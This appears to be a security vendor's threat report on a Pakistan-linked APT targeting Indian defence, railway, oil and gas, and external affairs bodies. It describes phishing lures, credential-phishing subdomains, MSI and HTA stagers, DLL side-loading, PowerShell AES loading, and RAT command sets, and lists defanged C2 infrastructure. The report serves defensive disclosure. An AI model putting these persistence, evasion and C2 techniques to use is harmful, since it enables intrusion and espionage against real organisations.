The Digital Personal Data Protection (DPDP) Act 2023 is a landmark regulation with far-reaching implications for the BFSI sector in India. The Act fosters a more secure and trustworthy digital financial ecosystem by strengthening data protection, empowering individuals, and enforcing stringent data handling standards. Proactive compliance is not just a legal requirement but a strategic necessity for BFSI institutions to build customer trust, enhance brand reputation, and stay competitive in an evolving digital landscape.
Seqrite offers a comprehensive suite of data protection solutions to help BFSI organizations navigate the complexities of the DPDP Act and ensure robust compliance.
Seqrite Labs APT team has uncovered new tactics of Pakistan-linked SideCopy APT deployed since the last week of December 2024. The group has expanded its scope of targeting beyond Indian government, defence, maritime sectors, and university students to now include entities under railway, oil & gas, and external affairs ministries. One notable shift in recent campaigns is the transition from using HTML Application (HTA) files to adopting Microsoft Installer (MSI) packages as a primary staging mechanism.
Threat actors are continuously evolving their tactics to evade detection, and this shift is driven by their persistent use of DLL side-loading and multi-platform intrusions. This evolution also incorporates techniques such as reflective loading and repurposing open-source tools such as Xeno RAT and Spark RAT, following its trend with Async RAT to extend its capabilities. Additionally, a new payload dubbed CurlBack RAT has been identified that registers the victim with the C2 server.
Key Findings
Usernames associated with attacker email IDs are impersonating a government personnel member with cyber security background, utilizing compromised IDs.
A fake domain mimicking an e-governance service, with an open directory, is used to host payloads and credential phishing login pages.
Thirteen sub-domains and URLs host login pages for various RTS Services for multiple City Municipal Corporations (CMCs), all in the state of Maharashtra.
The official domain of National Hydrology Project (NHP), under the Ministry of Water Resources, has been compromised to deliver malicious payloads.
New tactics such as reflective loading and AES decryption of resource section via PowerShell to deploy a custom version of C#-based open-source tool XenoRAT.
A modified variant of Golang-based open-source tool SparkRAT, is targeting Linux platforms, has been deployed via the same stager previously used for Poseidon and Ares RAT payloads.
A new RAT dubbed CurlBack utilizing DLL side-loading technique is used. It registers the victim with C2 server via UUID and supports file transfer using curl.
Honey-trap themed campaigns were observed in January 2025 and June 2024, coinciding with the arrest of a government employee accused of leaking sensitive data to a Pakistani handler.
A previously compromised education portal seen in Aug 2024, became active again in February 2025 with new URLs targeting university students. These employ three different themes: “Climate Change”, “Research Work”, and “Professional” (Complete analysis can be viewed in the recording here, explaining six different clusters of SideCopy APT).
The parent group of SideCopy, APT36, has targeted Afghanistan after a long with a theme related to Office of the Prisoners Administration (OPA) under Islamic Emirate of Afghanistan. A recent campaign targeting Linux systems with the theme “Developing Leadership for Future Wars” involves AES/RC4 encrypted stagers to drop MeshAgent RMM tool.
Targeted sectors under the Indian Ministry
Railways
Oil & Gas
External Affairs
Defence
Phishing Emails
The campaign targeting the Defence sector beings with a phishing email dated 13 January 2025, with the subject “Update schedule for NDC 65 as discussed”. The email contains a link to download a file named “NDC65-Updated-Schedule.pdf” to lure the target.
Fig. 1 – NDC Phishing Email (1)
A second phishing email sent on 15 January 2025 with the subject “Policy update for this course.txt”, also contains a phishing link. This email originates from an official-looking email ID which is likely compromised. National Defence College (NDC) is a defence service training institute for strategic and practice of National Security located in Delhi, operates under the Ministry of Defence, India.
Fig. 2 – NDC Phishing Email (2)
The attacker’s email address “gsosystems-ndc@outlook[.]com”, was created on 10 January 2025 in UAE and was last seen active on 28 February 2025. OSINT reveals similar looking email ID “gsosystems.ndc-mod@nic[.]in” belonging to National Informatics Centre (NIC), a department under the Ministry of Electronics and Information Technology (MeitY), India. The username linked to the attacker’s email impersonates a government personnel member with cyber security background.
Fig. 3 – Attacker Email
Decoy Documents
The decoy is related to the National Defence College (NDC) in India and contains the Annual Training Calendar (Study & Activities) for the year 2025 for the 65th Course (NDC-65). Located in New Delhi, it is the defence service training institute and highest seat of strategic learning for officers of the Defence Service (Indian Armed Forces) and the Civil Services, all operating under the Ministry of Defence, India.
Fig. 4 – NDC Calendar Decoy [Defence]
Another phishing archive file observed with name “2024-National-Holidays-RH-PER_N-1.zip”, comes in two different variants targeting either Windows or Linux systems. Once the payload is triggered, it leads to a decoy document that contains a list of holidays for the Open Line staff for the year 2024 as the name suggests. This is an official notice from Southern Railway dated 19 December 2023, specifically for the Chennai Division. Southern Railway (SR) is one of the eighteen zones of Indian Railways, a state-owned undertaking of the Ministry of Railways, India.
Fig. 5 – Holiday List Decoy [Railways]
The third infection chain includes a document titled “Cybersecurity Guidelines” for the year 2024, which appears to be issued by Hindustan Petroleum Corporation Limited (HPCL). Headquarted in Mumbai, HPCL is a public sector undertaking in petroleum and natural gas industry and is a subsidiary of the Oil and Natural Gas Corporation (ONGC), a state-owned undertaking of the Ministry of Petroleum and Natural Gas, India.
Another document linked to the same infection is the “Pharmaceutical Product Catalogue” for 2025, issued by MAPRA. It is specifically intended for employees of the Ministry of External Affairs (MEA), in India. Mapra Laboratories Pvt. Ltd. is a pharmaceutical company with headquarters in Mumbai.
Fig. 7 – Catalogue Decoy [External Affairs]
OpenDir and CredPhish
A fake domain impersonating the e-Governance portal services has been utilized to carry out the campaign targeting railway entities. This domain was created on 16 June 2023 and features an open directory hosting multiple files, identified during the investigation.
Fig. 8 – Open directory
A total of 13 sub-domains have been identified, which function as login portals for various systems such as:
Webmail
Safety Tank Management System
Payroll System
Set Authority
These are likely used for credential phishing, actively impersonating multiple legitimate government portals since last year. These login pages are typically associated with RTS Services (Right to Public Services Act) and cater to various City Municipal Corporations (CMC). All these fake portals belong to cities located within the state of Maharashtra:
Chandrapur
Gadchiroli
Akola
Satara
Vasai Virar
Ballarpur
Mira Bhaindar
Fig. 9 – Login portals hosted on fake domain
The following table lists the identified sub-domains and the dates they were first observed:
Sub-domains
First Seen
gadchiroli.egovservice[.]in
2024-12-16
pen.egovservice[.]in
2024-11-27
cpcontacts.egovservice[.]in
cpanel.egovservice[.]in
webdisk.egovservice[.]in
cpcalendars.egovservice[.]in
webmail.egovservice[.]in
2024-01-03
dss.egovservice[.]in
cmc.egovservice[.]in
2023-11-03
mail.egovservice[.]in
2023-10-13
pakola.egovservice[.]in
pakora.egovservice[.]in
2023-07-23
egovservice[.]in
2023-06-16
All these domains have the following DNS history primarily registered under AS 140641 (YOTTA NETWORK SERVICES PRIVATE LIMITED). This indicates a possible coordinated infrastructure set up to impersonate legitimate services and collect credentials from unsuspecting users.
Fig. 10 – DNS history
Further investigation into the open directory revealed additional URLs associated with the fake domain. These URLs likely serve similar phishing purposes and host further decoy content.
hxxps://egovservice.in/vvcmcrts/
hxxps://egovservice.in/vvcmc_safety_tank/
hxxps://egovservice.in/testformonline/test_form
hxxps://egovservice.in/payroll_vvcmc/
hxxps://egovservice.in/pakora/egovservice.in/
hxxps://egovservice.in/dssrts/
hxxps://egovservice.in/cmc/
hxxps://egovservice.in/vvcmcrtsballarpur72/
hxxps://egovservice.in/dss/
hxxps://egovservice.in/130521/set_authority/
hxxps://egovservice.in/130521/13/
Cluster-A
The first cluster of SideCopy’s operations shows a sophisticated approach by simultaneously targeting both Windows and Linux environments. New remote access trojans (RATs) have been added to their arsenal, enhancing their capability to compromise diverse systems effectively.
Fig. 11 – Cluster A
Windows
A spear-phishing email link downloads an archive file, that contains double extension (.pdf.lnk) shortcut. They are hosted on domains that look to be legitimate:
The shortcut triggers cmd.exe with arguments that utilize escape characters (^) to evade detection and reduce readability. A new machine ID “dv-kevin” is seen with these files as we see “desktop-” prefix in its place usually.
Fig. 12 – Shortcuts with double extension
Utility msiexec.exe is used for installing the MSI packages that are hosted remotely. It uses quiet mode flag with the installation switch.
The first domain mimics a fake e-governance site seen with the open directory, while the second one is a compromised domain that belongs to the official National Hydrology Project, an entity under the Ministry of Water Resources. The MSI contains a .NET executable ConsoleApp1.exe which drops multiple PE files that are base64 encoded. Firstly, the decoy document is dropped in Public directory and opened, whereas remaining PE files are dropped in ‘C:\ProgramData\LavaSoft\’. Among them are two DLLs:
Legitimate DLL: Sampeose.dll
Malicious DLL: DUI70.dll, identified as CurlBack RAT.
Fig. 13 – Dropper within MSI package
CurlBack RAT
A signed Windows binary girbesre.exe with original name CameraSettingsUIHost.exe is dropped beside the DLLs. Upon execution, the EXE side-loads the malicious DLL. Persistence is achieved by dropping a HTA script (svnides.hta) that creates a Run registry key for the EXE. Two different malicious DLL samples were found, which have the compilation timestamps as 2024-12-24 and 2024-12-30.
Fig. 14 – Checking response ‘/antivmcommand’
CurlBack RAT initially checks the response of a specific URL with the command ‘/antivmcommand’. If the response is “on”, it proceeds, otherwise it terminates itself thereby maintaining a check. It gathers system information, and any connected USB devices using the registry key:
“SYSTEM\\ControlSet001\\Enum\\USBSTOR”
Fig. 15 – Retrieving system info and USB devices
Displays connected and running processes are enumerated to check for explorer, msedge, chrome, notepad, taskmgr, services, defender, and settings.
Fig. 16 – Enumerate displays and processes
Next, it generates a UUID for client registration with the C2 server. The ID generated is dumped at “C:\Users\<username>\.client_id.txt” along with the username.
Fig. 17 – Client ID generated for C2 registration
Before registering with the ID, persistence is set up via scheduled task with the name “OneDrive” for the legitimate binary, which can be observed at the location: “C:\Windows\System32\Tasks\OneDrive”.
Fig. 18 – Scheduled Task
Reversed strings appended to the C2 domain and their purpose:
String
Functionality
/retsiger/
Register client with the C2
/sdnammoc/
Fetch commands from C2
/taebtraeh/
Check connection with C2 regularly
/stluser/
Upload results to the C2
Once registered, the connection is kept alive to retrieve any commands that are returned in the response.
Fig. 19 – Commands response after registration
If the response contains any value, it retrieves the current timestamp and executes one of the following C2 commands:
Command
Functionality
info
Gather system information
download
Download files from the host
persistence
Modify persistence settings
run
Execute arbitrary commands
extract
Extract data from the system
permission
Check and elevate privileges
users
Enumerate user accounts
cmd
Execute command-line operations
Fig. 20 – Checking process privilege with ‘permission’ command
Other basic functions include fetching user and host details, extracting archive files, and creating tasks. Strings and code show that CURL within the malicious DLL is present to enumerate and transfer various file formats:
Image files: GIF, JPEG, JPG, SVG
Text files: TXT, HTML, PDF, XML
Fig. 21 – CURL protocols supported
Linux
In addition to its Windows-focused attacks, the first cluster of SideCopy also targets Linux environments. The malicious archive file shares the same name as its Windows counterpart, but with a modification date of 2024-12-20. This archive contains a Go-based ELF binary, reflecting a consistent cross-platform strategy. Upon analysis, the function flow of the stager has code similarity to the stagers associated with Poseidon and Ares RAT. These are linked to Transparent Tribe and SideCopy APTs respectively.
Fig. 22 – Golang Stager for Linux
Stager functionality:
Uses wget command to download a decoy from egovservice domain into the target directory /.local/share and open it (National-Holidays-RH-PER_N-1.pdf).
Download the final payload elf as /.local/share/xdg-open and execute.
Create a crontab ‘/dev/shm/mycron’ to maintain persistence through system reboot for the payload, under the current username.
The final payload delivered by the stager is Spark RAT, an open-source remote access trojan with cross-platform support for Windows, macOS, and Linux systems. Written in Golang and released on GitHub in 2022, the RAT is very popular with over 500 forks. Spark RAT uses WebSocket protocol and HTTP requests to communicate with the C2 server.
Fig. 23 – Custom Spark RAT ‘thunder’ connecting to C2
Features of Spark RAT include process management and termination, network traffic monitoring, file exploration and transfer, file editing and deletion, code highlighting, desktop monitoring, screenshot capture, OS information retrieval, and remote terminal access. Additionally, it supports power management functions like shutdown, reboot, log-off, sleep, hibernate and lock screen functions.
Cluster-B
The second cluster of SideCopy’s activities targets Windows systems, although we suspect that it is targeting Linux systems based on their infrastructure observed since 2023.
Fig. 24 – Cluster B
The infection starts with a spear-phishing email link, that downloads an archive file named ‘NDC65-Updated-Schedule.zip’. This contains a shortcut file in double extension format which triggers a remote HTA file hosted on another compromised domain:
The machine ID associated with the LNK “desktop-ey8nc5b” has been observed in previous campaigns of SideCopy, although the modification date ‘2023:05:26’ suggests it may be an older one being reused. In parallel to the MSI stagers, the group continues to utilize HTA-based stagers which remain almost fully undetected (FUD).
Fig. 26 – Almost FUD stager of HTA
The HTA file contains a Base64 encoded .NET payload BroaderAspect.dll, which is decoded and loaded directly into the memory of MSHTA. This binary opens the dropped NDC decoy document in ProgramData directory and an addtional .NET stager as a PDF in the Public directory. Persistence is set via Run registry key with the name “Edgre” and executes as:
The dropped .NET binary named ‘Myapp.pdb’ has two resource files:
“Myapp.Resources.Document.pdf”
“Myapp.Properties.Resources.resources”
The first one is decoded using Caesar cipher with shift of 9 characters in backward direction. It is dropped as ‘Public\Downloads\Document.pdf’ (122.98 KB), which is a 2004 GIAC Paper on “Advanced communication techniques of remote access trojan horses on windows operating systems”.
Fig. 27– Document with appended payload
Though it is not a decoy, an encrypted payload is appended at the end. The malware searches for the “%%EOF” marker to separate PDF data from EXE data. The PDF data is extracted from the start to the marker, while the EXE Data is extracted after skipping 6 bytes beyond the marker.
Fig. 28 – Extracting EXE after EOF marker
After some delay, the EXE data is dropped as “Public\Downloads\suport.exe” (49.53 KB) which is sent as an argument along with a key to trigger a PowerShell command.
Fig. 29 – Extracting resource and triggering PowerShell
PowerShell Stage
The execution of PowerShell command with basic arguments “-NoProfile -ExecutionPolicy Bypass -Command” to ignore policies and profile is seen. Two parameters are sent:
After some delay, the encryption key is decoded from Base64, and the first 16 bytes are treated as the IV for AES encryption (CBC mode with PKCS7 padding). This is done to load the decrypted binary as a .NET assembly directly into memory, invoking its entry point.
Fig. 30 – PowerShell decryption
Custom Xeno RAT
Dumping the final .NET payload named ‘DevApp.exe’ leads us to familiar functions seen in Xeno RAT. It is an open source remote access trojan that was first seen at the end of 2023. Key features include HVNC, live microphone access, socks5 reverse proxy, UAC bypass, keylogger, and more. The custom variant used by SideCopy has added basic string manipulation methods with C2 and port as 79.141.161[.]58:1256.
Fig. 31 – Custom Xeno RAT
Last year, a custom Xeno RAT variant named MoonPeak was used by a North Korean-linked APT tracked as UAT-5394. Similarly, custom Spark RAT variants have been adopted by Chinese-speaking actors such as DragonSpark and TAG-100.
Infrastructure and Attribution
Domains used for malware staging by the threat group. Most of them have registrar as GoDaddy.com, LLC.
Staging Domain
First Seen
Created
ASN
modspaceinterior[.]com
Jan 2025
Sept 2024
AS 46606 – GoDaddy
drjagrutichavan[.]com
Jan 2025
Oct 2021
AS 394695 – GoDaddy
nhp.mowr[.]gov[.]in
Dec 2024
Feb 2005
AS 4758 – National Informatics Centre
egovservice[.]in
Dec 2024
June 2023
AS 140641 – GoDaddy
pmshriggssssiwan[.]in
Nov 2024
Mar 2024
AS 47583 – Hostinger
educationportals[.]in
Aug 2024
Aug 2024
AS 22612 – NameCheap
C2 domains have been created just before the campaign in the last week of December 2024. With Canadian registrar “Internet Domain Service BS Corp.”, they resolve to IPs with Cloudflare ASN 13335 located in California.
C2 Domain
Created
IP
ASN
updates.widgetservicecenter[.]com
2024-Dec-25
104.21.15[.]163
172.67.163[.]31
ASN 13335 – Clouflare
updates.biossysinternal[.]com
2024-Dec-23
172.67.167[.]230
104.21.13[.]17
ASN 202015 – HZ Hosting Ltd.
The C2 for Xeno RAT 79.141.161[.]58 has a unique common name (CN=PACKERP-63KUN8U) with HZ Hosting Limited of ASN 202015. The port used for communication is 1256 but an open RDP port 56777 is also observed.
Fig. 32 – Diamond Model
Both C2 domains are associated with Cloudflare ASN 13335, resolved to IP range 172.67.xx.xx. Similar C2 domains on this ASN have previously been leveraged by SideCopy in attacks targeting the maritime sector. Considering the past infection clusters, observed TTPs and hosted open directories, these campaigns with new TTPs are attributed to SideCopy with high confidence.
Conclusion
Pakistan-linked SideCopy APT group has significantly evolved its tactics since late December 2024, expanding its targets to include critical sectors such as railways, oil & gas, and external affairs ministries. The group has shifted from using HTA files to MSI packages as a primary staging mechanism and continues to employ advanced techniques like DLL side-loading, reflective loading, and AES decryption via PowerShell. Additionally, they are leveraging customized open-source tools like Xeno RAT and Spark RAT, along with deploying the newly identified CurlBack RAT. Compromised domains and fake sites are being utilized for credential phishing and payload hosting, highlighting the group’s ongoing efforts to enhance persistence and evade detection.
